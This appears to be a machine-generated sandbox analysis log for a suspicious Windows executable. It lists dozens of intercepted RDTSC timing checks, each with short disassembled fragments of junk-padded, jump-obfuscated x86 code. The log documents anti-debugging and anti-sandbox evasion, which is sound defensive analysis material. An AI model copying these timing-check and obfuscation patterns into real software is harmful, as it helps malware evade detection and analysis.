Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765FD second address: C5DE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+129C2675h], edi 0x0000000e call dword ptr [ebp+129C2644h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FD13CB4AEF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76A13 second address: C76A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C29 second address: C76C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C2D second address: C76C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C33 second address: C76C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jmp 00007FD13CB4AF05h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C67 second address: C76C82 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD13D063718h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b movzx edi, cx 0x0000000e push 237F6748h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C82 second address: C76C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C86 second address: C76C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76F22 second address: C76F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76F30 second address: C76F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76F36 second address: C76F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7713D second address: C77147 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD13D06371Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7783E second address: C77857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FD13CB4AEF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77857 second address: C7785D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7785D second address: C77864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77864 second address: C7789F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD13D063718h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 adc di, 3670h 0x00000027 lea eax, dword ptr [ebp+12B683A6h] 0x0000002d mov ecx, 7EE3D4FFh 0x00000032 push eax 0x00000033 pushad 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5E971 second address: C5E99C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD13CB4AEF6h 0x00000008 je 00007FD13CB4AEF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FD13CB4AF06h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5E99C second address: C5E9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5E9A2 second address: C5E9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FD13CB4AEF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9526 second address: CA953D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 jbe 00007FD13D063716h 0x0000000d jng 00007FD13D063716h 0x00000013 pop edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA953D second address: CA9547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA97B8 second address: CA97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jl 00007FD13D063716h 0x00000010 jmp 00007FD13D063723h 0x00000015 popad 0x00000016 jng 00007FD13D06371Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA97E4 second address: CA9827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 ja 00007FD13CB4AEF6h 0x0000000e je 00007FD13CB4AEF6h 0x00000014 jmp 00007FD13CB4AF00h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FD13CB4AF09h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9827 second address: CA982C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA982C second address: CA983C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD13CB4AEF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA983C second address: CA9840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA99E0 second address: CA99E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F72 second address: CA9F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F78 second address: CA9F8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FD13CB4AEF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FD13CB4AEF6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F8E second address: CA9F98 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F98 second address: CA9FB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAFA7E second address: CAFA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAFA82 second address: CAFAA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD13CB4AF09h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAE7C6 second address: CAE7F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063728h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FD13D06371Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAE4D6 second address: CAE4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAE4DA second address: CAE4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13D063722h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAF1E0 second address: CAF209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007FD13CB4AEF6h 0x00000012 jmp 00007FD13CB4AF02h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAF209 second address: CAF20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB4DBF second address: CB4DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB4DC5 second address: CB4DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB4DC9 second address: CB4DCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB522A second address: CB522E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB522E second address: CB5257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD13CB4AF05h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD13CB4AEFEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5257 second address: CB5276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB53C0 second address: CB53D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13CB4AF00h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB53D6 second address: CB53E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13D06371Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB59CC second address: CB59D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5DF8 second address: CB5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5DFE second address: CB5E20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FD13CB4AF00h 0x00000010 popad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5E20 second address: CB5E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063722h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB9079 second address: CB907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CBC896 second address: CBC8AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FD13D063716h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CBC8AA second address: CBC8B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CBEA96 second address: CBEAA0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CBEC32 second address: CBEC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD13CB4AEFCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jo 00007FD13CB4AEF6h 0x00000013 jno 00007FD13CB4AEF6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CBEC53 second address: CBEC5D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD13D063722h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CBEC5D second address: CBECE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD13CB4AEF6h 0x0000000a jmp 00007FD13CB4AF04h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FD13CB4AEFDh 0x0000001a jmp 00007FD13CB4AF00h 0x0000001f jno 00007FD13CB4AEF6h 0x00000025 popad 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 ja 00007FD13CB4AEF6h 0x0000002f jmp 00007FD13CB4AF09h 0x00000034 push edi 0x00000035 pop edi 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FD13CB4AF05h 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CBECE3 second address: CBECE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC38D4 second address: CC38D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC38D8 second address: CC38F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD13D06371Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jo 00007FD13D063716h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC3057 second address: CC3098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD13CB4AF05h 0x00000012 jmp 00007FD13CB4AF06h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC31EE second address: CC320B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FD13D063716h 0x0000000b pop esi 0x0000000c jmp 00007FD13D06371Ah 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC320B second address: CC3215 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD13CB4AEF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC34E4 second address: CC34E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC6E91 second address: CC6E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CC7292 second address: CC729A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCB665 second address: CCB672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FD13CB4AEFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCB7E0 second address: CCB7ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCBBE7 second address: CCBBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCBBEB second address: CCBBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCBBF1 second address: CCBC26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFFh 0x00000007 jmp 00007FD13CB4AEFCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD13CB4AEFDh 0x00000016 js 00007FD13CB4AEF6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCBD65 second address: CCBD71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCBD71 second address: CCBD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C773A1 second address: C773BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13D063726h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C773BB second address: C773BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C773BF second address: C773F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jbe 00007FD13D06371Ch 0x00000010 pop eax 0x00000011 nop 0x00000012 adc dx, 1BBBh 0x00000017 movsx ecx, cx 0x0000001a push 00000004h 0x0000001c movzx edx, dx 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD13D063720h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C773F7 second address: C77412 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD13CB4AEFCh 0x00000008 jnp 00007FD13CB4AEF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jp 00007FD13CB4AF00h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7751E second address: C7756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edx, dword ptr [ebp+129C2B5Dh] 0x0000000e push 0000001Eh 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FD13D063718h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+129C27F3h] 0x00000030 nop 0x00000031 jne 00007FD13D06371Ch 0x00000037 push eax 0x00000038 jng 00007FD13D063724h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CCC03E second address: CCC044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD4D42 second address: CD4D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD4D4A second address: CD4D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD4D4F second address: CD4D59 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD13D063722h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD328F second address: CD32CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD13CB4AF09h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FD13CB4AEF6h 0x00000012 jmp 00007FD13CB4AF08h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD35B4 second address: CD35C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD13D063716h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD35C3 second address: CD35D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edx 0x00000008 jp 00007FD13CB4AEF6h 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD35D7 second address: CD35E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
